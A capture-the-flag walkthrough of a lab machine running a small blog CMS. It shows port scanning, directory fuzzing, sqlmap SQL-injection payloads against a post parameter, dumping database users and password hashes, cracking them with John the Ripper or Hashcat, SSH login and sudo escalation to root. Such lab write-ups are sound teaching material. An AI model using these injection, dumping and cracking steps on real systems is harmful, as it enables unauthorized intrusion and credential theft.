Category: SQL Injection
Obtain user & root flags
Complete all questions
Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.
Before engaging anything, connect or download your free VPN pack from the VPN tab.
After downloading your VPN pack, start the VPN using the following command:
sudo open path/to/vpn
most of the time it should be in your Downloads folder, here is the syntax:
sudo openvpn /Downloads/name.ovpn
After that, you can ping the host to ensure it's running.
Let's dive in with a quick
nmap scan since we know we are dealing with a CMS and it's vulnerable to SQL Injection according to the machine category and description we should know which specific port the CMS is running on and get an insight into which more ports are open.
nmap 10.14.0.71 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24 Nmap scan report for aero (10.14.0.71) Host is up (0.23s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
Without wasting any time, we need the CMS version running on port
80 and the GitHub repository of the CMS.
We can browse on port 80 using Firefox or your favorite browser and see if there is a CMS version/GitHub link mentioned anywhere.
A common place to look: the footer of the page, source code comments, and maybe response headers. We can also use the Wappalyzer extension to check the technology stack.
After trying all of the above methods, I didn't succeed to get the version but I got the developer name in the default page footer. Guess we will have to settle with a simple Google search after all.
So we have the repo this should lead us to the version and maybe other juicy stuff. After checking the latest commits, we get that the latest version is
v0.0.1 there is still another easier way of getting the version that I can't remember correctly.
Now that we have the CMS version, should we fire up Neesus and Metasploit and pwn the mainframe? NO.
How can we use this version number and GitHub repo?:
Search for known vulnerabilities associated with the version(which we already know it's SQLi)
Check if we can find default credentials in the GitHub repo
At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection but where does it occur? back to the drawing board, we need to enumerate the webpage to see where the vulnerability occurs.
To achieve this we can start by fuzzing for any endpoints or paths using Gobuster, Feroxbuster, or FFUF. let's use Feroxbuster & FFUF recursively and simultaneously because why not.
Here is the syntax for both:
-k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak
ffuf -u "
" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c
This is what we will get after running either of the above commands:
Sweet, looking at that output we can see that there is an admin panel, search panel, and other good stuff like
Remember that we can get the default username and password on the GitHub repo or on our target's homepage which is
Username: admin and
With those credentials, we can edit posts on the blog, add users, and give them permission but that's not our goal, we need to know where the SQLi occurs.
Okay so, this is what we have so far on the blog paths:
/search.php /login.php /post.php /admin.php /category.php -------snip--------
Well, this is where we channel our inner 1337_h4x0r moment.
We can fire up the old reliable
sqlmap or decide to do the injection manually on the following endpoints:
If you browse all the paths properly, it is like a buffet of taking user input.
As a hater and an elite hacker man, we are going to target
http://10.14.0.71/post.php?p_id=1 . there are other parts we can test for SQL injection like the search bar using Burp suite but let's stick with
Let's craft the
sqlmap syntax to trigger the vulnerability.
--dbms mysql --level 3 --risk 3
We are using the
--dbms tag because we already know the Database runs on MySQL because of the info we got from the Wappalyzer extension.
After running the above command we get the following output from
--- Parameter: p_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p_id=1 AND 5165=5165 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj) ---
We are golden!!,
p_id parameter it is. Now it's time to get the credz
Time to dump some more info and see what we will work with. Take this syntax and slap it right on the terminal:
--risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
It would be quicker if we dump info one by one from the Database name to all Columns
database management system users : [*] 'debian-sys-maint'@'localhost' [*] 'mysql.infoschema'@'localhost' [*] 'mysql.session'@'localhost' [*] 'mysql.sys'@'localhost' [*] 'neil'@'localhost' [*] 'phpmyadmin'@'localhost' [*] 'root'@'localhost'
Oooow, look at that Neil guy He looks famous I wonder what He did back then We won't mind getting His password hash
-p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6
From here we can use
John the Ripper or
Hashcat to crack the above hashes using the
john neil.hash --wordlist=/home/xi/rockyou.txt
john neil.hash --show
hashcat -m 3200 neil.hash rockyou.txt where
After retrieving the password for the user
neil we can use it to log in to the blog but let's see if the password can work on
SSH running on port 22.
In our case we get SSH access using the cracked password, now we can get and submit the
neil@space:~$ cat user.txt 76*************************************fff neil@space:~$
First, we run the command
sudo -l to check what our user
neil can run on the machine
neil@space:~$ sudo -l Matching Defaults entries for neil on space: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User neil may run the following commands on space: (ALL : ALL) ALL neil@space:~$
This should be easy as
neil@space:~$ sudo su root@space:/home/neil# cd ~ root@space:~# cat root.txt 2024****************************5602 root@space:~#